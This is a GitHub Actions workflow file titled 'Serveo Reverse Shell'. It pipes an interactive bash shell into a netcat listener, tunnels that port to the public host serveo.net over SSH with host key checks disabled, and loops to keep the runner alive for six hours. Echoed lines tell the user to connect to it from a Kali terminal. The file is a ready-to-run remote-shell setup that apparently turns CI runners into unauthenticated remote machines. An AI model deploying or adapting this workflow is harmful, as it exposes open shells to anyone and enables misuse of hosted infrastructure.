name: Serveo Reverse Shell

on:
  push:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    timeout-minutes: 360

    steps:
      - uses: actions/checkout@v4

      - name: Install Dependencies
        run: |
          sudo apt update
          sudo apt install -y openssh-client netcat-openbsd

      # Option 2: Let Serveo assign a port (for raw TCP)
      - name: Start Reverse Shell and Tunnel with Serveo (Serveo Assigned Port)
        run: |
          echo "=== Starting Reverse Shell (Listening) ==="
          mkfifo /tmp/backpipe
          /bin/bash -i < /tmp/backpipe 2>&1 | nc -lvnp 9001 > /tmp/backpipe &
          sleep 5
          echo "=== Starting Serveo Tunnel (Serveo Assigned Port) ==="
          # Run Serveo in the background and forward port 9001, accepting host key, NO PORT SPECIFIED ON SERVEO SIDE
          ssh -o StrictHostKeyChecking=no -R localhost:9001 serveo.net &
          sleep 10
          echo "=== Serveo Tunnel should be active. Check the logs for the forwarded port. ==="
          echo "=== To connect from your Kali terminal, use this command (after the workflow completes): ==="
          echo "=== nc serveo.net <serveo_assigned_port>  (Replace <serveo_assigned_port> with the port number from the 'Forwarding from ... to serveo.net:<port>' line in the logs) ==="
          # Keep workflow alive
          for i in {1..360}; do
            sleep 60
          done
